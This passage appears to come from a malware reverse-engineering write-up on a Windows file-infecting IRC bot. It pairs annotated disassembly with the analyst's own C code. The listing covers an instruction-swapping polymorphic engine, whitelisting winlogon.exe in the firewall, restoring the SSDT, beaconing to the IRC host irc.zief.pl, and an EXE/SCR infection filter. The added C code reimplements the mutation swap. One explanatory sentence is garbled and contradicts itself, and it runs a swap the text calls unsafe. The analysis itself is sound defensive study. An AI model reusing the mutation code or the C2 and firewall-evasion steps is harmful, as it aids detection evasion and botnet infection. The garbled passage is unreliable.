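    for (size_t i = 0; i < n; i++) {
        uint32_t t = 0;
        if (decode_patch(ex[i].first, sizeof ex[i].first, ex[i].addr, &t) != PATCH_NONE &&
            (t < ex[i].mod_lo || t >= ex[i].mod_hi))
            hooked++;
    }
    return hooked;
}

/* Constructed scenario: two exports of a module at 0x7C900000-0x7C9B0000; the
 * first is patched to point at a routine in an injected view at 0x7FF71000. */
int demo(void) {
    struct export_probe ex[2] = {
        { "ZwOpenFile", 0x7C901000, {0}, 0x7C900000, 0x7C9B0000 },
        { "ZwClose",    0x7C902000, {0xB8, 0x19, 0x00, 0x00, 0x00, 0xBA, 0x00, 0x03}, 0x7C900000, 0x7C9B0000 },
    };
    encode_push0_call(ex[0].first, ex[0].addr, 0x7FF71000);
    return count_hooked(ex, 2);
}

int main(void) {
    uint8_t p[7]; uint32_t t = 0;
    encode_push0_call(p, 0x7C901000, 0x7FF71000);
    printf("patch:"); for (int k = 0; k < 7; k++) printf(" %02X", p[k]); printf("\n");
    printf("kind %d target %08X\n", decode_patch(p, 7, 0x7C901000, &t), t);
    printf("hooked exports: %d\n", demo());
    return 0;
}
```

The "outside the owning module" test is what separates this kind of detour from legitimate in-module jumps; in a live scan the first bytes come from ReadProcessMemory on the injected process and the ranges from its module list.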
7FF719DC 8DB5 62511B00 lea esi,dword ptr ss:
7FF719E2 68 04010000 push 0x104
7FF719E7 56 push esi
7FF719E8 FF95 70501B00 call dword ptr ss: ; kernel32.GetSystemDirectoryA
Gets the system directory.
7FF71A40 FF95 94501B00 call dword ptr ss:
7FF71A46 93 xchg eax,ebx
7FF71A47 68 04000000 push 0x4
7FF71A4C 8DB5 4C1F1B00 lea esi,dword ptr ss:
7FF71A52 59 pop ecx
7FF71A53 8DBD 40511B00 lea edi,dword ptr ss:
7FF71A59 E8 CAF2FFFF call 7FF70D28 ; fill in function addresses: the advapi32 registry functions
7FF71A5E 55 push ebp
7FF71A5F 81C5 05101B00 add ebp,0x1B1005
7FF71A65 E8 A5E5FFFF call 7FF7000F ; create the event object
7FF71A6A 5D pop ebp
7FF71A6B FF95 7C501B00 call dword ptr ss: ; GetTickCount
7FF71A71 8985 B6541B00 mov dword ptr ss:,eax
7FF71A77 8B85 9F101B00 mov eax,dword ptr ss:
7FF71A7D E8 03FEFFFF call 7FF71885 ; XOR part of the code
7FF71A82 0F31 rdtsc
7FF71A84 8985 9F101B00 mov dword ptr ss:,eax
7FF71A8A 0085 C2111B00 add byte ptr ss:,al
7FF71A90 E8 F0FDFFFF call 7FF71885 ; XOR part of the code
7FF71A95 33C9 xor ecx,ecx
7FF71A97 51 push ecx
7FF71A98 8DB5 00101B00 lea esi,dword ptr ss:
7FF71A9E 0FB7848D 101C1B>movzx eax,word ptr ss:
7FF71AA6 0FB68C8D 121C1B>movzx ecx,byte ptr ss:
7FF71AAE 03F0 add esi,eax
7FF71AB0 51 push ecx
7FF71AB1 E8 5E210000 call 7FF73C14 ; length-disassembler engine
7FF71AB6 6A 05 push 0x5
7FF71AB8 58 pop eax
About this length-disassembler engine: from a rough look, it uses the first opcode byte to look up the instruction type in a table and then, depending on the type, parses the rest of the instruction: ModRM, SIB, displacement, immediate. I am a bit rusty on this material; a complete analysis of the engine would take a lot of my time, and my level is not there yet.
Next comes the virus's instruction-mutation engine, which changes the code dynamically to remove static signatures.
7FF71A97 51 push ecx ; save the counter
7FF71A98 8DB5 00101B00 lea esi,dword ptr ss: ; base of the code to mutate
7FF71A9E 0FB7848D 101C1B>movzx eax,word ptr ss: ; offset selected by the iteration number
7FF71AA6 0FB68C8D 121C1B>movzx ecx,byte ptr ss: ; disassembly mode? this parameter is unclear
7FF71AAE 03F0 add esi,eax
7FF71AB0 51 push ecx
7FF71AB1 E8 5E210000 call 7FF73C14 ; 反汇编长度引擎
7FF71AB6 6A 05 push 0x5 ; ecx now holds the length of the instruction at esi
7FF71AB8 58 pop eax
7FF71AB9 E8 6AF7FFFF call 7FF71228 ; 随机数生成函数eax为参数
7FF71ABE 0AD2 or dl,dl ; test the random value
7FF71AC0 74 04 je short 7FF71AC6
7FF71AC2 03F1 add esi,ecx ; leave this one alone, advance to the next instruction
7FF71AC4 EB 1D jmp short 7FF71AE3
7FF71AC6 8DBD 62511B00 lea edi,dword ptr ss:
7FF71ACC 51 push ecx ; length
7FF71ACD 56 push esi ; source instruction
7FF71ACE F3:A4 rep movs byte ptr es:,byte ptr ds: ; copy the instruction aside
7FF71AD0 E8 3F210000 call 7FF73C14 ; length engine, now on the following instruction
7FF71AD5 5F pop edi
7FF71AD6 F3:A4 rep movs byte ptr es:,byte ptr ds: ; move the second instruction over the first
7FF71AD8 59 pop ecx
7FF71AD9 57 push edi
7FF71ADA 8DB5 62511B00 lea esi,dword ptr ss:
7FF71AE0 F3:A4 rep movs byte ptr es:,byte ptr ds:
7FF71AE2 5E pop esi ; the mutation: two adjacent instructions are swapped when the random value allows it
7FF71AE3 59 pop ecx ; the instructions eligible for this are recorded in a table
7FF71AE4^ E2 CA loopd short 7FF71AB0
7FF71AE6 59 pop ecx
7FF71AE7 FEC1 inc cl ; counter
7FF71AE9 80F9 10 cmp cl,0x10 ; 16 instructions per pass
7FF71AEC^ 72 A9 jb short 7FF71A97
This technique is worth learning from.
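A minimal length disassembler and the adjacent-instruction swap, as an added example (my code, not the virus's engine). It covers the 32-bit opcodes that occur in this listing (the add..cmp family, mov/lea/test/xchg, push/pop, immediate forms, the 80-83/C0-C1/F6-F7/FE-FF groups, 0F jcc/movzx/btc/rdtsc, string ops, short and near jumps, 66/F2/F3 prefixes) and returns 0 for anything else, which a real engine must treat as "do not mutate here". The swap reproduces 7FF71AC6-7FF71AE2 mechanically; whether swapping two given instructions is safe is the engine's table-driven decision, which this example does not model.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bytes consumed by a ModRM byte and what follows it (SIB, displacement). */
static int modrm_len(const uint8_t *p, size_t avail) {
    if (avail < 1) return -1;
    uint8_t mod = p[0] >> 6, rm = p[0] & 7;
    int len = 1;
    if (mod != 3 && rm == 4) {                          /* SIB follows */
        if (avail < 2) return -1;
        len++;
        if (mod == 0 && (p[1] & 7) == 5) len += 4;      /* [disp32 + index*scale] */
    }
    if (mod == 1) len += 1;                              /* disp8 */
    else if (mod == 2 || (mod == 0 && rm == 5)) len += 4; /* disp32 */
    return len;
}

/* Length of the instruction at p, or 0 if the opcode is outside the table
 * or the buffer ends inside the instruction. */
int insn_len(const uint8_t *p, size_t avail) {
    size_t i = 0; int op16 = 0, mrm = 0, imm = 0;
    while (i < avail && (p[i] == 0x66 || p[i] == 0xF2 || p[i] == 0xF3)) { op16 |= p[i] == 0x66; i++; }
    if (i >= avail) return 0;
    uint8_t op = p[i++];
    int immz = op16 ? 2 : 4;                             /* operand-size immediate */
    if (op == 0x0F) {
        if (i >= avail) return 0;
        uint8_t op2 = p[i++];
        if (op2 >= 0x80 && op2 <= 0x8F) imm = 4;         /* jcc rel32 */
        else if (op2 == 0xB6 || op2 == 0xB7 || op2 == 0xBB || op2 == 0xAF) mrm = 1; /* movzx, btc, imul */
        else if (op2 != 0x31) return 0;                  /* rdtsc is just 0F 31 */
    }
    else if (op < 0x40 && (op & 7) < 6) {                /* add/or/adc/sbb/and/sub/xor/cmp */
        if ((op & 7) < 4) mrm = 1; else if ((op & 7) == 4) imm = 1; else imm = immz;
    }
    else if (op >= 0x40 && op <= 0x5F) ;                 /* inc/dec/push/pop reg */
    else if (op == 0x68) imm = 4;
    else if (op == 0x6A) imm = 1;
    else if (op == 0x69) { mrm = 1; imm = immz; }
    else if (op == 0x6B) { mrm = 1; imm = 1; }
    else if (op >= 0x70 && op <= 0x7F) imm = 1;          /* jcc rel8 */
    else if (op == 0x80 || op == 0x83 || op == 0xC0 || op == 0xC1 || op == 0xC6) { mrm = 1; imm = 1; }
    else if (op == 0x81 || op == 0xC7) { mrm = 1; imm = immz; }
    else if ((op >= 0x84 && op <= 0x8F) || (op >= 0xD0 && op <= 0xD3) ||
             op == 0xF6 || op == 0xF7 || op == 0xFE || op == 0xFF) mrm = 1;
    else if (op >= 0x90 && op <= 0x97) ;                 /* nop, xchg eax,reg */
    else if (op >= 0xA0 && op <= 0xA3) imm = 4;          /* mov moffs32 */
    else if (op == 0xA8) imm = 1;
    else if (op == 0xA9) imm = immz;
    else if (op >= 0xA4 && op <= 0xAF) ;                 /* movs/cmps/stos/lods/scas */
    else if (op >= 0xB0 && op <= 0xB7) imm = 1;
    else if (op >= 0xB8 && op <= 0xBF) imm = immz;
    else if (op == 0xC2) imm = 2;
    else if (op == 0xC3 || op == 0xCC || (op >= 0xF8 && op <= 0xFD)) ;
    else if (op == 0xE8 || op == 0xE9) imm = 4;
    else if (op == 0xEB || op == 0xE2 || op == 0xE3) imm = 1; /* jmp short, loop, jecxz */
    else return 0;
    if (mrm) {
        int m = modrm_len(p + i, avail - i);
        if (m < 0) return 0;
        if ((op == 0xF6 || op == 0xF7) && ((p[i] >> 3) & 7) < 2)   /* test r/m,imm carries an immediate */
            imm = op == 0xF6 ? 1 : immz;
        i += (size_t)m;
    }
    i += (size_t)imm;
    return i <= avail ? (int)i : 0;
}

/* 7FF71AC6-7FF71AE2: copy instruction A aside, slide the following B over it,
 * append A. Returns the pair's length, 0 if either cannot be decoded. */
int swap_adjacent(uint8_t *buf, size_t len, size_t off) {
    if (off >= len) return 0;
    int a = insn_len(buf + off, len - off);
    if (a <= 0 || a > 15) return 0;
    int b = insn_len(buf + off + a, len - off - (size_t)a);
    if (b <= 0) return 0;
    uint8_t tmp[15];
    memcpy(tmp, buf + off, (size_t)a);
    memmove(buf + off, buf + off + a, (size_t)b);
    memcpy(buf + off + b, tmp, (size_t)a);
    return a + b;
}

int main(void) {
    /* three instructions from the listing: mov ebx,[..]; and ebx,-0x1000; jnz rel32 */
    static const uint8_t sample[] = { 0x8B,0x1D,0xE0,0x63,0x40,0x00, 0x81,0xE3,0x00,0xF0,0xFF,0xFF, 0x0F,0x85,0x0A,0,0,0 };
    for (size_t off = 0; off < sizeof sample; ) {
        int n = insn_len(sample + off, sizeof sample - off);
        if (n <= 0) break;
        printf("offset %zu: %d bytes\n", off, n);
        off += (size_t)n;
    }
    uint8_t code[] = { 0x56, 0x33,0xF6, 0x6A,0x02 };     /* push esi ; xor esi,esi ; push 2 */
    printf("swap -> %d bytes: %02X %02X %02X\n", swap_adjacent(code, sizeof code, 0), code[0], code[1], code[2]);
    return 0;
}
```

The example swap above is only legal because `push esi` and `xor esi,esi` happen to be reorderable in that direction is false: swapping them changes what gets pushed, which is exactly why the engine keeps a table of eligible instructions and a random gate rather than swapping blindly. The decoder also shows why the engine is "compact": almost all of x86 length decoding is the ModRM/SIB rule plus a per-opcode immediate size.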
7FF71AF1 E8 32F7FFFF call 7FF71228 ; random number generator
7FF71AF6 85D2 test edx,edx
7FF71AF8 75 0D jnz short 7FF71B07
7FF71AFA 8DBD 0A101B00 lea edi,dword ptr ss:
7FF71B00 B1 04 mov cl,0x4
7FF71B02 E8 35F7FFFF call 7FF7123C
7FF71B07 FF8D 88131B00 dec dword ptr ss:
7FF71B0D 6A 20 push 0x20
7FF71B0F 58 pop eax
7FF71B10 E8 13F7FFFF call 7FF71228 ; random number generator
7FF71B15 33C9 xor ecx,ecx
7FF71B17 0FBB95 E2361B00 btc dword ptr ss:,edx
7FF71B1E 8D85 B2541B00 lea eax,dword ptr ss:
7FF71B24 51 push ecx
7FF71B25 51 push ecx
7FF71B26 51 push ecx
7FF71B27 51 push ecx
7FF71B28 50 push eax
7FF71B29 51 push ecx
7FF71B2A 51 push ecx
7FF71B2B 51 push ecx ; only lpVolumeSerialNumber (eax) is non-NULL: fetch the volume serial number
7FF71B2C FF95 88501B00 call dword ptr ss: ; GetVolumeInformationA
7FF71B32 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF71B6B 8DB5 62511B00 lea esi,dword ptr ss:
7FF71B71 68 C8000000 push 0xC8
7FF71B76 56 push esi
7FF71B77 6A 00 push 0x0 ; hModule NULL: path of the current process image
7FF71B79 FF95 6C501B00 call dword ptr ss: ; kernel32.GetModuleFileNameA
7FF71B85 8DBD 2A521B00 lea edi,dword ptr ss:
7FF71B8B 56 push esi
7FF71B8C 52 push edx
7FF71B8D 57 push edi
7FF71B8E FF95 20501B00 call dword ptr ss:
7FF71B94 83C4 0C add esp,0xC
7FF71B97 8D95 6A271B00 lea edx,dword ptr ss:
7FF71B9D 50 push eax
7FF71B9E 57 push edi
7FF71B9F 6A 01 push 0x1
7FF71BA1 56 push esi
7FF71BA2 52 push edx
7FF71BA3 68 02000080 push 0x80000002
7FF71BA8 FFD3 call ebx ; SHSetValueA
Here it writes the registry. The arguments are:
01EDFF9C 80000002
01EDFFA0 7FF7176A ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List"
01EDFFA4 7FF74162 ASCII "\??\C:\WINDOWS\system32\winlogon.exe"
01EDFFA8 00000001
01EDFFAC 7FF7422A ASCII "\??\C:\WINDOWS\system32\winlogon.exe:*:enabled:@shell32.dll,-1"
01EDFFB0 0000003E
"\??\C:\WINDOWS\system32\winlogon.exe" is the path of the current process (the code is running inside winlogon.exe).
Read as a call: SHSetValueA(HKEY_LOCAL_MACHINE (0x80000002), "SYSTEM\...\FirewallPolicy\StandardProfile\AuthorizedApplications\List", "<path>", REG_SZ (1), "<path>:*:enabled:@shell32.dll,-1", 0x3E). That is the Windows XP firewall's authorized-application list, so the host process is whitelisted and the IRC connection below is not blocked. It is also a useful host-based indicator: a system process such as winlogon.exe has no business in the firewall exception list.
7FF71548 8D95 96541B00 lea edx,dword ptr ss: ; .\WINDOWS\system32\ntkrnlpa.exe
7FF7154E 54 push esp
7FF7154F 6A 06 push 0x6
7FF71551 52 push edx
7FF71552 FF95 F4501B00 call dword ptr ss: ; ZwOpenSection
7FF71558 8B7424 08 mov esi,dword ptr ss:
7FF7155C 83C4 18 add esp,0x18
7FF7155F 85C0 test eax,eax
7FF71561 0F85 E5010000 jnz 7FF7174C
7FF71567 6A 00 push 0x0
7FF71569 68 20010000 push 0x120
7FF7156E 56 push esi
7FF7156F 6A 0B push 0xB
7FF71571 FF95 04511B00 call dword ptr ss: ; ZwQuerySystemInformation
7FF71577 8B5E 0C mov ebx,dword ptr ds:
7FF7157A 8B4E 10 mov ecx,dword ptr ds:
7FF7157D 899D 9E541B00 mov dword ptr ss:,ebx
7FF71583 898D A2541B00 mov dword ptr ss:,ecx
7FF71589 81E3 00F0FF0F and ebx,0xFFFF000
7FF7158F 51 push ecx
7FF71590 53 push ebx
7FF71591 6A 00 push 0x0
7FF71593 6A 06 push 0x6
7FF71595 FFB5 96541B00 push dword ptr ss:
7FF7159B FF95 98501B00 call dword ptr ss: ; MapViewOfFile: map the kernel image into memory
7FF715A1 50 push eax
7FF715A2 FFB5 96541B00 push dword ptr ss:
7FF715A8 FF95 04501B00 call dword ptr ss: ; CloseHandle
7FF715AE 58 pop eax
7FF715AF 85C0 test eax,eax
7FF715B1 93 xchg eax,ebx
7FF715B2 0F84 94010000 je 7FF7174C
7FF715B8 66:813B 4D5A cmp word ptr ds:,0x5A4D ; check the DOS header
7FF715BD 74 0C je short 7FF715CB
7FF715BF 53 push ebx
7FF715C0 FF95 C4501B00 call dword ptr ss:
7FF715C6 E9 81010000 jmp 7FF7174C
7FF715CB 8DBE C8000000 lea edi,dword ptr ds:
7FF715D1 0FB74E 1E movzx ecx,word ptr ds:
7FF715D5 8D7431 1F lea esi,dword ptr ds:
7FF715D9 68 04010000 push 0x104
7FF715DE 57 push edi
7FF715DF FF95 70501B00 call dword ptr ss: ; GetSystemDirectoryA
7FF715E5 56 push esi
7FF715E6 57 push edi
7FF715E7 FF95 28501B00 call dword ptr ss: ; concatenate the strings
7FF715ED 8B43 3C mov eax,dword ptr ds:
7FF715F0 03C3 add eax,ebx ;"C:\WINDOWS\system32\ntkrnlpa.exe"
7FF715F2 8B50 78 mov edx,dword ptr ds:
7FF715F5 03D3 add edx,ebx
7FF715F7 8B72 20 mov esi,dword ptr ds:
7FF715FA 8B4A 18 mov ecx,dword ptr ds:
7FF715FD 8D3433 lea esi,dword ptr ds:
7FF71600 51 push ecx
7FF71601 AD lods dword ptr ds:
7FF71602 03C3 add eax,ebx
7FF71604 8178 01 6553657>cmp dword ptr ds:,0x72655365 ; "eSerC" at name+1: looking for KeServiceDescriptorTable
7FF7160B 74 05 je short 7FF71612
7FF7160D^ E2 F2 loopd short 7FF71601
7FF7160F 59 pop ecx
7FF71610^ EB AD jmp short 7FF715BF
7FF71612 290C24 sub dword ptr ss:,ecx ;KeServiceDescriptorTable
7FF71615 8B72 24 mov esi,dword ptr ds: ; the export found this way is KeServiceDescriptorTable
7FF71618 59 pop ecx
7FF71619 03F3 add esi,ebx
7FF7161B 8B52 1C mov edx,dword ptr ds:
7FF7161E 0FB7044E movzx eax,word ptr ds:
7FF71622 03D3 add edx,ebx
7FF71624 8B3482 mov esi,dword ptr ds:
7FF71627 03F3 add esi,ebx
7FF71629 8B4E 08 mov ecx,dword ptr ds:
7FF7162C 89B5 A6541B00 mov dword ptr ss:,esi
7FF71632 8B36 mov esi,dword ptr ds:
7FF71634 3BB5 9E541B00 cmp esi,dword ptr ss:
7FF7163A^ 72 83 jb short 7FF715BF
7FF7163C 2BB5 9E541B00 sub esi,dword ptr ss:
7FF71642 3BB5 A2541B00 cmp esi,dword ptr ss:
7FF71648^ 0F83 71FFFFFF jnb 7FF715BF
7FF7164E 33C0 xor eax,eax
7FF71650 89B5 AA541B00 mov dword ptr ss:,esi
7FF71656 898D AE541B00 mov dword ptr ss:,ecx
7FF7165C 50 push eax
7FF7165D 50 push eax
7FF7165E 6A 03 push 0x3
7FF71660 50 push eax
7FF71661 6A 01 push 0x1
7FF71663 68 00000080 push 0x80000000
7FF71668 57 push edi
7FF71669 FF85 2C161B00 inc dword ptr ss:
7FF7166F FF95 40501B00 call dword ptr ss: ; CreateFileA
7FF71675 FF8D 2C161B00 dec dword ptr ss:
7FF7167B 83F8 FF cmp eax,-0x1
7FF7167E^ 0F84 3BFFFFFF je 7FF715BF
7FF71684 8985 96541B00 mov dword ptr ss:,eax
7FF7168A 8B43 3C mov eax,dword ptr ds:
7FF7168D 03C3 add eax,ebx
7FF7168F 0FB750 14 movzx edx,word ptr ds:
7FF71693 0FB748 06 movzx ecx,word ptr ds:
7FF71697 8D4402 18 lea eax,dword ptr ds:
7FF7169B 8B50 0C mov edx,dword ptr ds:
7FF7169E 3BD6 cmp edx,esi
7FF716A0 77 07 ja short 7FF716A9
7FF716A2 0350 10 add edx,dword ptr ds:
7FF716A5 3BD6 cmp edx,esi
7FF716A7 77 16 ja short 7FF716BF
7FF716A9 83C0 28 add eax,0x28
7FF716AC^ E2 ED loopd short 7FF7169B
7FF716AE FFB5 96541B00 push dword ptr ss:
7FF716B4 FF95 04501B00 call dword ptr ss:
7FF716BA^ E9 00FFFFFF jmp 7FF715BF
7FF716BF 2B70 0C sub esi,dword ptr ds:
7FF716C2 6A 00 push 0x0
7FF716C4 0370 14 add esi,dword ptr ds:
7FF716C7 6A 00 push 0x0
7FF716C9 56 push esi
7FF716CA FFB5 96541B00 push dword ptr ss:
7FF716D0 FF95 B4501B00 call dword ptr ss: ; SetFilePointer
7FF716D6 8B85 AE541B00 mov eax,dword ptr ss:
7FF716DC C1E0 02 shl eax,0x2
7FF716DF 50 push eax
7FF716E0 50 push eax
7FF716E1 6A 00 push 0x0
7FF716E3 FF95 90501B00 call dword ptr ss: ; GlobalAlloc
7FF716E9 8985 9A541B00 mov dword ptr ss:,eax
7FF716EF 8BD4 mov edx,esp
7FF716F1 6A 00 push 0x0
7FF716F3 52 push edx
7FF716F4 FF32 push dword ptr ds:
7FF716F6 50 push eax
7FF716F7 FFB5 96541B00 push dword ptr ss:
7FF716FD FF95 A8501B00 call dword ptr ss: ; ReadFile
7FF71703 8B85 96541B00 mov eax,dword ptr ss:
7FF71709 890424 mov dword ptr ss:,eax
7FF7170C FF95 04501B00 call dword ptr ss: ; CloseHandle
7FF71712 8B53 3C mov edx,dword ptr ds:
7FF71715 8BB5 9A541B00 mov esi,dword ptr ss:
7FF7171B 8B541A 34 mov edx,dword ptr ds:
7FF7171F 8BFE mov edi,esi
7FF71721 2B95 9E541B00 sub edx,dword ptr ss:
7FF71727 8B8D AE541B00 mov ecx,dword ptr ss:
7FF7172D AD lods dword ptr ds:
7FF7172E 2BC2 sub eax,edx
7FF71730 AB stos dword ptr es:
7FF71731^ E2 FA loopd short 7FF7172D ; rebase every entry (SSDT?)
7FF71733 8D85 AF241B00 lea eax,dword ptr ss:
I do not know the kernel side well, so this part is hazy to me. Mechanically, the listing does the following: ZwQuerySystemInformation with class 0xB (SystemModuleInformation) yields the kernel's load address and size (7FF71571-7FF7157A); the on-disk kernel image is mapped and its KeServiceDescriptorTable export located (7FF71601-7FF71615); the table's ServiceTableBase pointer is bounds-checked against the kernel image and converted from an RVA to a file offset through the section headers (7FF7169B-7FF716BF); NumberOfServices*4 bytes are read from the file (7FF716D6-7FF716FD); and (OptionalHeader.ImageBase - running kernel base) is subtracted from every entry (7FF71712-7FF71731). The result is the original SSDT contents as they would appear in the running kernel, which is what one needs to detect or undo SSDT hooks.
7FF71BD3 8DBD 10511B00 lea edi,dword ptr ss:
7FF71BD9 E8 4AF1FFFF call 7FF70D28 ; fill in the networking functions
7FF71BDE E8 0C000000 call 7FF71BEF
7FF74110 71A26A55 ws2_32.WSAStartup
7FF74114 71A23E2B ws2_32.closesocket
7FF74118 71A24A07 ws2_32.connect
7FF7411C 71A25355 ws2_32.gethostbyname
7FF74120 71A42E70 wsock32.recv
7FF74124 71A24C27 ws2_32.send
7FF74128 71A24211 ws2_32.socket
With these APIs filled in it obviously intends to talk to the network, and with the wininet set below, to download.
7FF71C0A 8DBD 2C511B00 lea edi,dword ptr ss:
7FF71C10 E8 13F1FFFF call 7FF70D28
7FF71C15 83BD 30511B00 0>cmp dword ptr ss:,0x0
Another fill:
7FF7412C 76694D8C wininet.InternetCloseHandle
7FF74130 766A5C4E wininet.InternetGetConnectedState
7FF74134 7669578E wininet.InternetOpenA
7FF74138 76695A5A wininet.InternetOpenUrlA
7FF7413C 766982EA wininet.InternetReadFile
7FF71C03 8DB5 381F1B00 lea esi,dword ptr ss:
7FF71C09 59 pop ecx
7FF71C0A 8DBD 2C511B00 lea edi,dword ptr ss:
7FF71C10 E8 13F1FFFF call 7FF70D28
7FF71C15 83BD 30511B00 0>cmp dword ptr ss:,0x0
7FF71C1C 0F84 4C020000 je 7FF71E6E
7FF71C22 81EC 90010000 sub esp,0x190
7FF71C28 54 push esp
7FF71C29 68 01010000 push 0x101
7FF71C2E FF95 10511B00 call dword ptr ss: ;WSAStartup
7FF71C34 81C4 90010000 add esp,0x190
7FF71C3A 50 push eax
7FF71C3B 8BD4 mov edx,esp
7FF71C3D 6A 00 push 0x0
7FF71C3F 52 push edx
7FF71C40 FF95 30511B00 call dword ptr ss: ; InternetGetConnectedState
7FF71C46 85C0 test eax,eax
7FF71C48 59 pop ecx
7FF71C49 75 0D jnz short 7FF71C58
7FF71C4B 68 88130000 push 0x1388
7FF71C50 FF95 C0501B00 call dword ptr ss: ; Sleep(0x1388 = 5000 ms)
7FF71C56^ EB E2 jmp short 7FF71C3A ; keep polling until a connection exists
7FF71C58 66:C785 1F281B0>mov word ptr ss:,0x5000
7FF71C61 83A5 21281B00 0>and dword ptr ss:,0x0
7FF71C68 8DBD 25281B00 lea edi,dword ptr ss:
7FF71C6E 57 push edi
7FF71C6F FF95 1C511B00 call dword ptr ss: ; gethostbyname
7FF71C75 85C0 test eax,eax ; irc.zief.pl
7FF71C77 75 24 jnz short 7FF71C9D ; resolved: read h_addr_list[0] below
7FF71C79 57 push edi
7FF71C7A FF95 38501B00 call dword ptr ss: ; string length (presumably lstrlenA)
7FF71C80 8D7C38 01 lea edi,dword ptr ds:
7FF71C84 803F 00 cmp byte ptr ds:,0x0
7FF71C87^ 75 E5 jnz short 7FF71C6E ; try the next hostname in the NUL-separated list
7FF71C89 E8 11FCFFFF call 7FF7189F
7FF71C8E 83BD 21281B00 0>cmp dword ptr ss:,0x0
7FF71C95 0F84 BA010000 je 7FF71E55
7FF71C9B EB 0D jmp short 7FF71CAA
7FF71C9D 8B40 0C mov eax,dword ptr ds:
7FF71CA0 8B00 mov eax,dword ptr ds:
7FF71CA2 FF30 push dword ptr ds:
7FF71CA4 8F85 21281B00 pop dword ptr ss:
7FF71CAA 6A 00 push 0x0
7FF71CAC 6A 01 push 0x1
7FF71CAE 6A 02 push 0x2
7FF71CB0 FF95 28511B00 call dword ptr ss: ; socket
7FF71CB6 83F8 FF cmp eax,-0x1 ; did socket(AF_INET, SOCK_STREAM, 0) fail?
7FF71CB9 0F84 96010000 je 7FF71E55
7FF71CBF 93 xchg eax,ebx
7FF71CC0 8D95 1D281B00 lea edx,dword ptr ss:
7FF71CC6 6A 10 push 0x10
7FF71CC8 52 push edx
7FF71CC9 53 push ebx
7FF71CCA FF95 18511B00 call dword ptr ss: ; connect
7FF71CD0 85C0 test eax,eax
7FF71CD2 0F85 76010000 jnz 7FF71E4E
7FF71CD8 8DBD 6A281B00 lea edi,dword ptr ss:
7FF71CDE B1 08 mov cl,0x8
7FF71CE0 E8 57F5FFFF call 7FF7123C
7FF71CE5 68 94000000 push 0x94
7FF71CEA 5E pop esi
7FF71CEB 2BE6 sub esp,esi
7FF71CED 893424 mov dword ptr ss:,esi
7FF71CF0 54 push esp
7FF71CF1 FF95 84501B00 call dword ptr ss: ; GetVersionExA
7FF71CF7 8DBD 78281B00 lea edi,dword ptr ss:
7FF71CFD B1 01 mov cl,0x1
7FF71CFF E8 38F5FFFF call 7FF7123C
7FF71D04 8D95 65281B00 lea edx,dword ptr ss:
7FF71D0A 6A 00 push 0x0
7FF71D0C 68 14000000 push 0x14
7FF71D11 52 push edx
7FF71D12 53 push ebx
7FF71D13 FF95 24511B00 call dword ptr ss: ; send
What is sent is:
7FF71865  4E 49 43 4B 20 70 6E 71 79 65 61 65 6B 0A 55 53  NICK pnqyeaek.US
7FF71875  45 52 20                                         ER 
Not FTP: NICK followed by USER is the IRC client registration, which fits the irc.zief.pl hostname resolved above and the JOIN that follows. The 8-character nick is produced by the call at 7FF71CE0 (cl = 8), which looks like the random-string routine, so it differs per run.
7FF71D72 57 push edi
7FF71D73 FF95 20501B00 call dword ptr ss:
7FF71D79 81C4 B0000000 add esp,0xB0
7FF71D7F 6A 00 push 0x0
7FF71D81 50 push eax
7FF71D82 57 push edi
7FF71D83 53 push ebx
7FF71D84 FF95 24511B00 call dword ptr ss: ; ws2_32.send
7FF71D8A 8B8D 1C161B00 mov ecx,dword ptr ss:
7FF74162  30 32 30 35 30 31 20 2E 20 2E 20 3A 23 64 63 31  020501 . . :#dc1
7FF74172  62 32 30 32 39 30 20 53 65 72 76 69 63 65 20 50  b20290 Service P
7FF74182  61 63 6B 20 33 0A 4A 4F 49 4E 20 00 5C 00 69 00  ack 3.JOIN .\.i.
7FF74192  64 00 62 00 74 00 56 00 74                       d.b.t.V.t
The USER line carries the OS version obtained from GetVersionExA (here "Service Pack 3"), after which the bot JOINs its channel; the infected host announces itself to the IRC command server.
7FF71DC3 8DB5 62511B00 lea esi,dword ptr ss:
7FF71DC9 8D8D 61531B00 lea ecx,dword ptr ss:
7FF71DCF 2BCE sub ecx,esi
7FF71DD1 6A 00 push 0x0
7FF71DD3 51 push ecx
7FF71DD4 56 push esi
7FF71DD5 53 push ebx
7FF71DD6 FF95 20511B00 call dword ptr ss: ; recv
7FF71DDC 83F8 00 cmp eax,0x0
7FF71DDF 7E 6D jle short 7FF71E4E
7FF71DE1 91 xchg eax,ecx
Then it enters the receive loop.
--------------------------------------------------------------------------------
Next is the infection part.
Load explorer.exe in OllyDbg and set a breakpoint at the hooked ZwOpenFile.
7FF82792 C685 61531B00 0>mov byte ptr ss:,0x0
7FF82799 3D 45584500 cmp eax,0x455845 ; EXE
7FF8279E 74 0C je short 7FF827AC
7FF827A0 3D 53435200 cmp eax,0x524353 ; SCR
7FF827A5 74 05 je short 7FF827AC
7FF827A7^ E9 C2F9FFFF jmp 7FF8216E
7FF827AC 8B03 mov eax,dword ptr ds:
7FF827AE 3D 57494E43 cmp eax,0x434E4957 ; WINC
7FF827B3^ 74 F2 je short 7FF827A7
7FF827B5 3D 5743554E cmp eax,0x4E554357 ; WCUN
7FF827BA^ 74 EB je short 7FF827A7
7FF827BC 3D 57433332 cmp eax,0x32334357 ; WC32
7FF827C1^ 74 E4 je short 7FF827A7
7FF827C3 3D 4F545350 cmp eax,0x5053544F ; OTSP
7FF827C8^ 74 DD je short 7FF827A7
This is the extension filter: only EXE and SCR files are infected.
The start of the file name is filtered as well: names whose first four bytes are WINC, WCUN, WC32 or OTSP are skipped.
7FF81FE3 8DB5 62531B00 lea esi,dword ptr ss:
7FF81FE9 85DB test ebx,ebx
7FF81FEB 74 25 je short 7FF82012
7FF81FED 56 push esi
7FF81FEE FF95 60501B00 call dword ptr ss: ; GetFileAttributesA
7FF81FF4 83F8 FF cmp eax,-0x1
7FF81FF7 74 19 je short 7FF82012
7FF81FF9 8985 66541B00 mov dword ptr ss:,eax
7FF81FFF 6A 00 push 0x0
7FF82001 56 push esi
7FF82002 FF95 B0501B00 call dword ptr ss: ; SetFileAttributesA
7FF82008 85C0 test eax,eax
7FF8200A 74 06 je short 7FF82012
7FF8200C FE85 06551B00 inc byte ptr ss:
7FF82012 2BC0 sub eax,eax
7FF82014 50 push eax
7FF82015 50 push eax
7FF82016 6A 03 push 0x3
7FF82018 50 push eax
